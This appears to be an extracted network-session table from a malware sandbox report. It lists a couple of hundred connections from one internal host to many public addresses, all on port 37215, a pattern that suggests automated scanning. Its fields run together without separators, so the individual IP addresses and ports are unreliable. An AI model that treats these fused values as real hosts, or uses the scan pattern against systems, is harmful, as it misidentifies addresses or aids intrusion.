                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20576192.168.2.1537580156.9.175.2737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20577192.168.2.1543870186.165.96.15537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20578192.168.2.155297031.31.9.3737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20579192.168.2.1556260102.23.172.7237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20580192.168.2.154554631.17.66.15737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20581192.168.2.153414431.151.182.17437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20582192.168.2.154433645.39.62.13737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20583192.168.2.1549388186.72.73.5937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20584192.168.2.1545774186.29.194.8437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20585192.168.2.1538424190.222.54.17037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20586192.168.2.154070031.166.18.22237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20587192.168.2.1539370138.20.190.3137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20588192.168.2.1546704181.88.134.18137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20589192.168.2.1547906197.238.191.3137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20590192.168.2.1542544190.219.1.13137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20591192.168.2.1553828190.73.201.6337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20592192.168.2.1535230102.71.90.7137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20593192.168.2.153342437.235.205.22437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20594192.168.2.1559042190.39.176.9437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20595192.168.2.1548712121.157.81.437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20596192.168.2.155519831.165.154.13737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20597192.168.2.1552720156.179.8.24337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20598192.168.2.154873231.245.116.18137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20599192.168.2.155259837.1.143.4637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20600192.168.2.1544900186.166.115.23837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20601192.168.2.1554524186.250.132.19637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20602192.168.2.1553772190.20.115.15637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20603192.168.2.155519837.156.107.7237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20604192.168.2.1539194222.133.63.6037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20605192.168.2.1546234102.123.205.20237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20606192.168.2.1549814122.196.126.1137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20607192.168.2.154901494.179.204.637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20608192.168.2.1549060102.28.156.2837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20609192.168.2.1549092181.32.17.16137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20610192.168.2.154183841.161.113.22637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20611192.168.2.1558012181.38.185.13837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20612192.168.2.155387441.207.201.22937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20613192.168.2.1554288138.63.157.14437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20614192.168.2.1556584157.105.121.7137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20615192.168.2.155095694.94.87.6637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20616192.168.2.154328641.50.182.25037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20617192.168.2.1539478181.84.104.15237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20618192.168.2.1543612156.228.25.1637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20619192.168.2.154643431.20.56.11537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20620192.168.2.153616483.42.46.23337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20621192.168.2.1540564121.147.246.10937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20622192.168.2.1539186156.196.18.17337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20623192.168.2.154895231.102.120.6637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20624192.168.2.155358641.160.141.2537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20625192.168.2.1548620192.123.26.037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20626192.168.2.154193441.211.179.19737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20627192.168.2.1545162138.19.234.24637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20628192.168.2.1558054197.65.46.22537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20629192.168.2.153741694.174.111.16737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20630192.168.2.1533928156.58.218.6137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20631192.168.2.1558254222.112.34.13937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20632192.168.2.1543818138.72.45.23037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20633192.168.2.1542392156.204.59.17737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20634192.168.2.1534766197.44.166.4237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20635192.168.2.1541680190.122.167.18337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20636192.168.2.154106294.16.249.24237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20637192.168.2.155426841.217.232.17337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20638192.168.2.1539838122.122.63.4137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20639192.168.2.1543810157.73.18.17337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20640192.168.2.1551306121.99.226.5737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20641192.168.2.154526837.69.26.25237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20642192.168.2.154572645.53.69.19537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20643192.168.2.154946894.70.209.13737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20644192.168.2.1559624222.106.175.13937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20645192.168.2.155893294.54.121.7437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20646192.168.2.1541262157.94.161.12237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20647192.168.2.1540990156.78.23.18937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20648192.168.2.1553064197.75.230.18237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20649192.168.2.1552982138.60.228.2937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20650192.168.2.155572441.197.98.24137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20651192.168.2.1537446173.205.22.21137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20652192.168.2.1544310190.206.217.20637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20653192.168.2.155425445.17.174.17337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20654192.168.2.1559450142.83.210.12337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20655192.168.2.154532431.74.38.14137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20656192.168.2.1547038181.250.133.16837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20657192.168.2.1541320138.47.223.17237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20658192.168.2.1552232156.39.38.8337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20659192.168.2.154048631.155.91.4337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20660192.168.2.1532976157.247.77.25037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20661192.168.2.1538304222.85.110.24837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20662192.168.2.1543654207.70.168.12037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20663192.168.2.1554288197.59.137.6037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20664192.168.2.1553876197.210.208.9237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20665192.168.2.153958831.136.163.11437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20666192.168.2.155825637.158.73.5737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20667192.168.2.1554394197.166.92.17937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20668192.168.2.1534566186.25.106.7337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20669192.168.2.1536168186.11.55.7337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20670192.168.2.1550922122.72.190.10637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20671192.168.2.1541780156.116.246.20037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20672192.168.2.153990694.41.203.15337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20673192.168.2.1553124157.55.31.8537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20674192.168.2.153492437.108.6.3937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20675192.168.2.1555308197.88.161.20737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20676192.168.2.1547778121.163.248.2237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20677192.168.2.1554514121.210.219.11837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20678192.168.2.1549506157.66.83.22837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20679192.168.2.1541798181.231.28.4637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20680192.168.2.1545816138.153.202.7737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20681192.168.2.1537830181.93.145.11037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20682192.168.2.1535336138.106.99.20137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20683192.168.2.1559954121.64.111.2737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20684192.168.2.1536420121.149.80.18937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20685192.168.2.1538954121.218.202.17437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20686192.168.2.1558420190.27.210.7237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20687192.168.2.154711831.100.104.8737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20688192.168.2.1552318181.217.87.22537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20689192.168.2.1548646157.227.5.11037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20690192.168.2.153651294.237.64.20937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20691192.168.2.155399431.171.193.21637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20692192.168.2.1555948186.187.198.6337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20693192.168.2.153732637.140.57.437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20694192.168.2.1548244122.44.89.20837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20695192.168.2.153756041.209.43.16337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20696192.168.2.155601894.209.178.12037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20697192.168.2.1543188190.204.175.20937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20698192.168.2.155430894.51.216.16337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20699192.168.2.155220641.211.162.5337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20700192.168.2.1546096186.101.65.3137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20701192.168.2.154786831.37.12.7737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20702192.168.2.1541308156.92.231.5337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20703192.168.2.1540264122.253.229.2337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20704192.168.2.155164437.244.232.9037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20705192.168.2.1539508156.83.9.13437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20706192.168.2.155977041.65.0.11837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20707192.168.2.1533278121.195.106.13837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20708192.168.2.1546816181.163.52.21337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20709192.168.2.154677845.254.183.14337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20710192.168.2.1541780181.248.55.3537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20711192.168.2.155616845.103.163.6437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20712192.168.2.1551284156.236.38.17637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20713192.168.2.155740837.144.157.14137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20714192.168.2.1548470192.238.56.3537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20715192.168.2.1557948190.178.233.15037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20716192.168.2.155622894.173.145.6037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20717192.168.2.154974445.31.84.13437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20718192.168.2.1536496122.109.18.5337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20719192.168.2.1552982156.98.114.13437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20720192.168.2.1549488197.123.14.10637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20721192.168.2.1557226156.50.167.15037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20722192.168.2.1556964190.129.176.11937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20723192.168.2.156039245.77.41.21437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20724192.168.2.1541280157.203.139.14237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20725192.168.2.153899837.242.117.637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20726192.168.2.154770837.249.53.16837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20727192.168.2.1553638190.78.174.4437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20728192.168.2.1543432197.45.141.22837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20729192.168.2.1543444181.15.139.24337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20730192.168.2.1557050181.203.64.12537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20731192.168.2.1534024157.108.100.9037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20732192.168.2.153338641.85.178.14637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20733192.168.2.1559054181.96.148.10037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20734192.168.2.1547184138.195.43.21037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20735192.168.2.1535418116.40.150.17837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20736192.168.2.1560330121.33.239.6637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20737192.168.2.1549562138.133.177.11037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20738192.168.2.1535854222.72.167.7637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20739192.168.2.153642031.95.109.18837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20740192.168.2.1536936181.215.163.10537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20741192.168.2.1546138122.118.170.17937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20742192.168.2.1544678121.99.21.16637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20743192.168.2.1546008222.239.152.6937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20744192.168.2.1548392181.90.89.6937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20745192.168.2.1546994102.11.199.3537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20746192.168.2.1560362138.29.243.16437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20747192.168.2.154923641.173.213.25037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20748192.168.2.1544290102.121.202.13237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20749192.168.2.1533216181.76.70.22437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20750192.168.2.1554006188.182.166.3337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20751192.168.2.1538856190.208.73.25137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20752192.168.2.1536460186.53.31.10737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20753192.168.2.1541388138.63.185.4937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20754192.168.2.155240437.123.118.7637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20755192.168.2.1540730121.250.85.5637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20756192.168.2.1533052149.139.68.15037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20757192.168.2.153546031.168.175.14337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20758192.168.2.1535142190.90.129.25237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20759192.168.2.1551616121.211.46.3537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20760192.168.2.154295641.24.90.19737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20761192.168.2.1539702122.214.97.20337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20762192.168.2.1545228156.194.36.2037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20763192.168.2.1533144156.180.46.10337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20764192.168.2.1534902157.88.214.10537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20765192.168.2.153320037.71.157.20237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20766192.168.2.156068037.94.56.23337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20767192.168.2.154152699.60.226.3737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20768192.168.2.153499645.95.156.1737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20769192.168.2.1557338181.65.50.7337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20770192.168.2.1551754156.250.113.25437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20771192.168.2.1543830181.186.35.18837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20772192.168.2.153362431.57.33.13637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20773192.168.2.153854894.178.226.3137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20774192.168.2.1547916138.152.164.4837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20775192.168.2.153874241.205.84.3037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20776192.168.2.1537006203.53.49.3337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20777192.168.2.153374694.205.100.4937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20778192.168.2.155928045.129.208.637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20779192.168.2.1559736122.144.11.237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20780192.168.2.1539490181.29.16.16137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20781192.168.2.155654637.69.117.2537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20782192.168.2.1535852222.102.162.14637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20783192.168.2.1545544121.93.202.10837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20784192.168.2.1554780186.46.175.16037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20785192.168.2.153560431.153.196.25237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20786192.168.2.1550032181.183.45.1437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20787192.168.2.153950841.159.50.19837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20788192.168.2.1536410121.124.55.12337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20789192.168.2.1546140121.12.50.21137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20790192.168.2.1559906190.216.70.5937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20791192.168.2.1536942190.39.143.16737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20792192.168.2.1547630222.38.21.11937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20793192.168.2.153964245.205.54.10837215
                                              TimestampBytes transferredDirectionData


